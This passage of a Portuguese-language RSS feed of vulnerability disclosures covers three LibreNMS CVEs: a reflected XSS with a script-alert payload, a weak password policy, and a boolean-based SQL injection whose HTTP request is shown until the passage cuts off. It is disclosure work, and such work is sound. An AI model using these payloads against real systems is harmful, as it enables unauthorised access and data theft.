        <description>&amp;lt;h2 id=&amp;#34;cve-2025-65013-cross-site-scripting-xss-refletido-no-endpoint-mapsnodeimage-parâmetro-image-name&amp;#34;&amp;gt;CVE-2025-65013: Cross-Site Scripting (XSS) Refletido no endpoint &amp;lt;code&amp;gt;/maps/nodeimage&amp;lt;/code&amp;gt; parâmetro &amp;lt;code&amp;gt;Image Name&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-65013&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-65013&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Uma vulnerabilidade de XSS (Cross-Site Scripting Refletido) foi identificada no endpoint &amp;lt;code&amp;gt;/maps/nodeimage&amp;lt;/code&amp;gt; do aplicativo LibreNMS. Essa vulnerabilidade permite que invasores injetem scripts maliciosos no parâmetro &amp;lt;code&amp;gt;Image Name&amp;lt;/code&amp;gt;.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Endpoint Vulnerável: &amp;lt;code&amp;gt;/maps/nodeimage&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parâmetro: &amp;lt;code&amp;gt;Image Name&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;O aplicativo não consegue validar e sanitizar adequadamente as entradas do usuário no parâmetro &amp;lt;code&amp;gt;Image Name&amp;lt;/code&amp;gt;. Essa falta de validação permite que invasores injetem scripts maliciosos, que são armazenados no servidor. Sempre que a página afetada é acessada, o payload malicioso é executado no navegador da vítima, potencialmente comprometendo os dados e o sistema do usuário.&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-65013-cross-site-scripting-xss-refletido-no-endpoint-mapsnodeimage-parâmetro-image-name&amp;#34;&amp;gt;CVE-2025-65013: Cross-Site Scripting (XSS) Refletido no endpoint &amp;lt;code&amp;gt;/maps/nodeimage&amp;lt;/code&amp;gt; parâmetro &amp;lt;code&amp;gt;Image Name&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-65013&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-65013&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Uma vulnerabilidade de XSS (Cross-Site Scripting Refletido) foi identificada no endpoint &amp;lt;code&amp;gt;/maps/nodeimage&amp;lt;/code&amp;gt; do aplicativo LibreNMS. Essa vulnerabilidade permite que invasores injetem scripts maliciosos no parâmetro &amp;lt;code&amp;gt;Image Name&amp;lt;/code&amp;gt;.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Endpoint Vulnerável: &amp;lt;code&amp;gt;/maps/nodeimage&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parâmetro: &amp;lt;code&amp;gt;Image Name&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;O aplicativo não consegue validar e sanitizar adequadamente as entradas do usuário no parâmetro &amp;lt;code&amp;gt;Image Name&amp;lt;/code&amp;gt;. Essa falta de validação permite que invasores injetem scripts maliciosos, que são armazenados no servidor. Sempre que a página afetada é acessada, o payload malicioso é executado no navegador da vítima, potencialmente comprometendo os dados e o sistema do usuário.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-html&amp;#34; data-lang=&amp;#34;html&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nt&amp;#34;&amp;gt;script&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;alert&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;(&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s1&amp;#34;&amp;gt;&amp;amp;#39;PoC-XXS51&amp;amp;#39;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;)&amp;amp;lt;/&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nt&amp;#34;&amp;gt;script&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-65013/image.png&amp;#34;
	width=&amp;#34;713&amp;#34;
	height=&amp;#34;589&amp;#34;
	srcset=&amp;#34;/p/cve-2025-65013/image_hu_d47d134d7563c0b1.png 480w, /p/cve-2025-65013/image_hu_790aaa5d86f85434.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;121&amp;#34;
		data-flex-basis=&amp;#34;290px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impacto&amp;#34;&amp;gt;Impacto
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
    &amp;lt;ul&amp;gt;
        &amp;lt;li&amp;gt;Roubo de cookies de sessão: Invasores podem usar cookies de sessão roubados para sequestrar a sessão de um usuário e executar ações em seu nome.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Baixar malware: Invasores podem induzir os usuários a baixar e instalar malware em seus computadores.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Sequestro de navegadores: Invasores podem sequestrar o navegador de um usuário ou aplicar exploits baseados nele.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Roubo de credenciais: Invasores podem roubar as credenciais de um usuário.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Obter informações confidenciais: Invasores podem obter informações confidenciais armazenadas na conta de um usuário ou em seu navegador.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Desfigurar sites: Invasores podem desfigurar um site alterando seu conteúdo.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Desorientar usuários: Invasores podem alterar as instruções fornecidas aos usuários que visitam o site alvo, desorientando seu comportamento.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Prejudicar a reputação de uma empresa: Invasores podem prejudicar a imagem de uma empresa ou espalhar desinformação desfigurando um site corporativo.&amp;lt;/li&amp;gt;
    &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;referência&amp;#34;&amp;gt;Referência
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/librenms/librenms/security/advisories/GHSA-j8cq-7f6p-256x&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/librenms/librenms/security/advisories/GHSA-j8cq-7f6p-256x&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;encontrado-por&amp;#34;&amp;gt;Encontrado por:
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/marcelo50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Marcelo Queiroz&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Tue, 18 Nov 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-65014</title>
        <link>https://www.cvehunters.com/pt/p/cve-2025-65014/</link>
        <guid>https://www.cvehunters.com/pt/p/cve-2025-65014/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-65014-vulnerabilidade-de-política-de-senhas-fraca-na-função-gerenciamento-de-usuário&amp;#34;&amp;gt;CVE-2025-65014: Vulnerabilidade de Política de Senhas Fraca na função Gerenciamento de Usuário
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-65014&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-65014&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Uma vulnerabilidade de Política de Senhas Fracas foi identificada na funcionalidade de gerenciamento de usuário do aplicativo LibreNMS. Essa vulnerabilidade permite a criação de contas com senhas extremamente fracas e previsíveis, como &amp;lt;code&amp;gt;123456&amp;lt;/code&amp;gt;. Isso expõe a plataforma a ataques de força bruta e preenchimento de credenciais.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;amp;laquo;p style=&amp;amp;ldquo;text-align: justify;&amp;amp;quot;&amp;amp;gt;O aplicativo não impõe uma política de senhas fortes ao criar novos usuários. Como resultado, os administradores podem definir senhas fracas, triviais e conhecidas, comprometendo a segurança de autenticação do sistema.&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-65014-vulnerabilidade-de-política-de-senhas-fraca-na-função-gerenciamento-de-usuário&amp;#34;&amp;gt;CVE-2025-65014: Vulnerabilidade de Política de Senhas Fraca na função Gerenciamento de Usuário
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-65014&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-65014&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Uma vulnerabilidade de Política de Senhas Fracas foi identificada na funcionalidade de gerenciamento de usuário do aplicativo LibreNMS. Essa vulnerabilidade permite a criação de contas com senhas extremamente fracas e previsíveis, como &amp;lt;code&amp;gt;123456&amp;lt;/code&amp;gt;. Isso expõe a plataforma a ataques de força bruta e preenchimento de credenciais.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;amp;laquo;p style=&amp;amp;ldquo;text-align: justify;&amp;amp;quot;&amp;amp;gt;O aplicativo não impõe uma política de senhas fortes ao criar novos usuários. Como resultado, os administradores podem definir senhas fracas, triviais e conhecidas, comprometendo a segurança de autenticação do sistema.&amp;lt;/p&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Componente vulnerável: &amp;lt;code&amp;gt;Criação de usuário / definição de senha&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h3 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h3&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
&amp;lt;ul&amp;gt;
&amp;lt;li&amp;gt;Faça login no aplicativo usando uma conta de &amp;lt;b&amp;gt;Administrador&amp;lt;/b&amp;gt;.&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;Navegue até a seção de gerenciamento de usuários:&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;Crie uma nova conta de usuário usando a senha &amp;lt;code&amp;gt;12345678&amp;lt;/code&amp;gt;.&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;O aplicativo aceita senhas fracas sem restrições e cria a conta com sucesso.&amp;lt;/li&amp;gt;
&amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-65014/image.png&amp;#34;
	width=&amp;#34;1103&amp;#34;
	height=&amp;#34;852&amp;#34;
	srcset=&amp;#34;/p/cve-2025-65014/image_hu_21856582e6cd0438.png 480w, /p/cve-2025-65014/image_hu_bd6251cd2138ff.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;129&amp;#34;
		data-flex-basis=&amp;#34;310px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-65014/image-1.png&amp;#34;
	width=&amp;#34;1359&amp;#34;
	height=&amp;#34;487&amp;#34;
	srcset=&amp;#34;/p/cve-2025-65014/image-1_hu_b22d3f1498de98f3.png 480w, /p/cve-2025-65014/image-1_hu_b4baf5a5f4a79968.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;279&amp;#34;
		data-flex-basis=&amp;#34;669px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impacto&amp;#34;&amp;gt;Impacto
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;Aumento do risco de ataques de força bruta e de preenchimento de credenciais.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Acesso não autorizado a contas de usuários ou administrativas.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Aumento de privilégios por meio de contas comprometidas.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Postura geral de segurança do aplicativo reduzida.&amp;lt;/li&amp;gt;
&amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;referência&amp;#34;&amp;gt;Referência
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/librenms/librenms/security/advisories/GHSA-5mrf-j8v6-f45g&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/librenms/librenms/security/advisories/GHSA-5mrf-j8v6-f45g&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;encontrado-por&amp;#34;&amp;gt;Encontrado por
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/marcelo50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Marcelo Queiroz&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Tue, 18 Nov 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-65093</title>
        <link>https://www.cvehunters.com/pt/p/cve-2025-65093/</link>
        <guid>https://www.cvehunters.com/pt/p/cve-2025-65093/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-65093-vulnerabilidade-de-injeção-sql-boolean-based-no-parâmetro-hostname-do-endpoint-ajax_outputphp&amp;#34;&amp;gt;CVE-2025-65093: Vulnerabilidade de Injeção SQL (Boolean-Based) no parâmetro &amp;lt;code&amp;gt;hostname&amp;lt;/code&amp;gt; do Endpoint &amp;lt;code&amp;gt;ajax_output.php&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-65093&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-65093&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Uma vulnerabilidade de injeção SQL foi descoberta no parâmetro &amp;lt;code&amp;gt;hostname&amp;lt;/code&amp;gt; do endpoint &amp;lt;code&amp;gt;ajax_output.php&amp;lt;/code&amp;gt;. Esse problema permite que qualquer invasor não autenticado injete consultas SQL arbitrárias, potencialmente levando a acesso não autorizado aos dados ou exploração adicional, dependendo da configuração do banco de dados.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;O aplicativo não consegue sanitizar adequadamente a entrada fornecida pelo usuário no parâmetro &amp;lt;code&amp;gt;hostname&amp;lt;/code&amp;gt;. Como resultado, payloads SQL especialmente criados são interpretados diretamente pelo banco de dados de back-end.&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-65093-vulnerabilidade-de-injeção-sql-boolean-based-no-parâmetro-hostname-do-endpoint-ajax_outputphp&amp;#34;&amp;gt;CVE-2025-65093: Vulnerabilidade de Injeção SQL (Boolean-Based) no parâmetro &amp;lt;code&amp;gt;hostname&amp;lt;/code&amp;gt; do Endpoint &amp;lt;code&amp;gt;ajax_output.php&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-65093&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-65093&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Uma vulnerabilidade de injeção SQL foi descoberta no parâmetro &amp;lt;code&amp;gt;hostname&amp;lt;/code&amp;gt; do endpoint &amp;lt;code&amp;gt;ajax_output.php&amp;lt;/code&amp;gt;. Esse problema permite que qualquer invasor não autenticado injete consultas SQL arbitrárias, potencialmente levando a acesso não autorizado aos dados ou exploração adicional, dependendo da configuração do banco de dados.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;O aplicativo não consegue sanitizar adequadamente a entrada fornecida pelo usuário no parâmetro &amp;lt;code&amp;gt;hostname&amp;lt;/code&amp;gt;. Como resultado, payloads SQL especialmente criados são interpretados diretamente pelo banco de dados de back-end.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Endpoint Vulnerável: &amp;lt;code&amp;gt;ajax_output.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parâmetro: &amp;lt;code&amp;gt;hostname&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
&amp;lt;ul&amp;gt;
&amp;lt;li&amp;gt;&amp;lt;b&amp;gt;Autentique-se com uma conta de administrador.&amp;lt;/b&amp;gt;&amp;lt;/br&amp;gt;
O endpoint de descoberta &amp;lt;code&amp;gt;/ajax_output.php&amp;lt;/code&amp;gt; só é acessível a usuários com privilégios de administrador.&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;Acesse a seguinte URL com o payload que avalia para &amp;lt;code&amp;gt;TRUE&amp;lt;/code&amp;gt;:&amp;lt;/code&amp;gt;&amp;lt;/li&amp;gt;
&amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;2
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;3
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;4
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;5
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;6
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;7
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;8
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;9
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-fallback&amp;#34; data-lang=&amp;#34;fallback&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;GET /ajax_output.php?id=capture&amp;amp;amp;format=text&amp;amp;amp;type=discovery&amp;amp;amp;hostname=10.0.5.4&amp;amp;#39;&#43;AND&#43;1=1&#43;AND&#43;&amp;amp;#39;1&amp;amp;#39;=&amp;amp;#39;1 HTTP/1.1
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Host: 10.0.5.5:8000
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Accept: */*
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Accept-Language: en-US,en;q=0.5
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Accept-Encoding: gzip, deflate
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Connection: keep-alive
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Referer: http://10.0.5.5:8000/device/3/capture
